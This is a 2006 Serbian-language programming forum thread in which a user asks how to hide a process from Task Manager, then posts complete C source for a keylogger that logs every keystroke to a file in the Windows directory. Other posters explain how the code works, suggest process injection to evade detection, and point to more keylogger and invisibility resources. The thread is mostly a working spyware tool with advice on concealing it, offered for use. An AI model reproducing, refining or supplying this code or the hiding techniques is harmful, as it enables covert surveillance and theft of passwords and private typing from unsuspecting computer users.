Kako sakriti proces od Task Managera?

[ Mix5 @ 18.09.2006. 13:16 ] @

[ X Files @ 18.09.2006. 15:08 ] @

(RegisterServiceProcess)
http://programmerassist.com/question/367
http://www.codeproject.com/sys...0&exp=0&select=1611270

http://www.codeproject.com/system/Hack_Windows_Task_Manager.asp

[ Nibble @ 18.09.2006. 15:26 ] @

Ovo ti je "slabo" rijesenje za keyloger jer procxp bi vidio ovaj proces.Ako hoces nesto bolje i pametnije trazi neke primjere u vezi process inject-inga(mada i to je matoro ali ima naravno novih nacina za to).

[ Mix5 @ 18.09.2006. 17:52 ] @

A koji su to novi nacini?

[ Mix5 @ 18.09.2006. 20:31 ] @

Nasao sam sledeci kod za keylogger

Code:
#include <stdio.h>
#include <windows.h>
#include <Winuser.h>

void keys(int key,char *file)
{

FILE *key_file;

key_file = fopen(file,"a+");

if (key==8)

fprintf(key_file,"%s","[del]");

if (key==13)

fprintf(key_file,"%s","\n");

if (key==32)

fprintf(key_file,"%s"," ");

if (key==VK_CAPITAL)

fprintf(key_file,"%s","[Caps]");

if (key==VK_TAB)

fprintf(key_file,"%s","[TAB]");

if (key ==VK_SHIFT)

fprintf(key_file,"%s","[SHIFT]");

if (key ==VK_CONTROL)

fprintf(key_file,"%s","[CTRL]");

if (key ==VK_PAUSE)

fprintf(key_file,"%s","[PAUSE]");

if (key ==VK_KANA)

fprintf(key_file,"%s","[Kana]");

if (key ==VK_ESCAPE)

fprintf(key_file,"%s","[ESC]");

if (key ==VK_END)

fprintf(key_file,"%s","[END]");

if (key==VK_HOME)

fprintf(key_file,"%s","[HOME]");

if (key ==VK_LEFT)

fprintf(key_file,"%s","[LEFT]");

if (key ==VK_UP)

fprintf(key_file,"%s","[UP]");

if (key ==VK_RIGHT)

fprintf(key_file,"%s","[RIGHT]");

if (key ==VK_DOWN)

fprintf(key_file,"%s","[DOWN]");

if (key ==VK_SNAPSHOT)

fprintf(key_file,"%s","[PRINT]");

if (key ==VK_NUMLOCK)

fprintf(key_file,"%s","[NUM LOCK]");

if (key ==190 || key==110)

fprintf(key_file,"%s",".");

if (key >=96 && key <= 105){

key = key - 48;

fprintf(key_file,"%s",&key);

}

if (key >=48 && key <= 59)

fprintf(key_file,"%s",&key);

if (key !=VK_LBUTTON || key !=VK_RBUTTON){

if (key >=65 && key <=90){

if (GetKeyState(VK_CAPITAL))

fprintf(key_file,"%s",&key);
else

{

key = key +32;

fprintf(key_file,"%s",&key);

}
}

}

fclose(key_file);

}

int main()
{

char i;

char test[MAX_PATH];
GetWindowsDirectory(test,sizeof(test));
strcat(test,"//keys.txt");

    while(1)
    {
        for(i=8;i<=190;i++)
        {
            if (GetAsyncKeyState(i) == -32767)
            {
                keys (i,test);
            }
        }
    }
}

Sta radi funkcija GetAsyncKeyState(i) i zasto se ispituje uslov

Code:
if (GetAsyncKeyState(i) == -32767)"

?
Zasto ova for petlja?

Posto je petlja while beskonacna opterecenje procesora je konstantno 100%.
Kako da prekinem petlju dok se ne pritisne nesto na tastaturi? Probao sam sa while(!kbhit()); ali i to mi ne pomaze je se u principu svodi na jedno te isto.

Ovi linkovi mi nisu bas od pomoci jer ne znam windows programiranje a pogotovu ne Delphi itd.

[ X Files @ 19.09.2006. 19:08 ] @

Citat:

Sta radi funkcija GetAsyncKeyState(i) i zasto se ispituje uslov
if (GetAsyncKeyState(i) == -32767)"

If the most significant bit is set, the key is down, and if the least significant bit is set,
the key was pressed after the previous call to GetAsyncKeyState.

Citat:

Zasto ova for petlja?

Kako, zašto...?! Zato što se i dalje ne zna KOJI je taster pritisnut.

Zna se samo da je odradio GetAsyncKeyState()

The GetAsyncKeyState function determines whether a key is up or down
at the time the function is called, and whether the key was pressed after
a previous call to GetAsyncKeyState.

Citat:

Posto je petlja while beskonacna opterecenje procesora je konstantno 100%.
Kako da prekinem petlju dok se ne pritisne nesto na tastaturi? Probao sam sa
while(!kbhit()); ali i to mi ne pomaze je se u principu svodi na jedno te isto.

Ne mozes da prekidas petlju. U tome i jeste fora, Windows je Message baziran.

Dovoljno je da stavis neki minimalan Sleep(), i merenje zauzetosti procesora ce pasti,
ioanko to nije realna vrednost.

[ Mix5 @ 20.09.2006. 15:39 ] @

Zbog cega je

Code:
if (key == 8) fprintf(file,"%s","[del]")

a ne

Code:
if (key == 127)

jer po ascii kodu del je 127?

[ X Files @ 20.09.2006. 16:51 ] @

Ne znam sta da ti kazem... Nisam detaljno gledao ali VK_DELETE je za DEL.

Mozda pogledaj neki bolji primer:
http://www.irongeek.com/i.php?page=security/keylogger

[ Mix5 @ 20.09.2006. 18:52 ] @

Nasao sam u winuser.h da je VK_DELETE 8, ali kako da znam sta su brojevi, sta mala a sta velika slova?

[ Mix5 @ 20.09.2006. 22:18 ] @

@X Files

Meni je ovo za for mnogo nelogicno.
Posto sam dodao linije

Code:

if(key == VK_RBUTTON) fprintf(key_file,"%s","[R.C]");

zasto mi onda upisuje [R.C] u fajl ako for petlja pocinje od 8 a u winuser.h je

Code:
#define VK_RBUTTON 2

_{[Ovu poruku je menjao Mix5 dana 21.09.2006. u 19:41 GMT+1]}

[ Mix5 @ 22.09.2006. 14:46 ] @

Nije valjda da bas niko nezna!!!

[ sasaas @ 02.10.2006. 08:30 ] @

prelistaj www.wasm.ru i potrazi invisibility.zip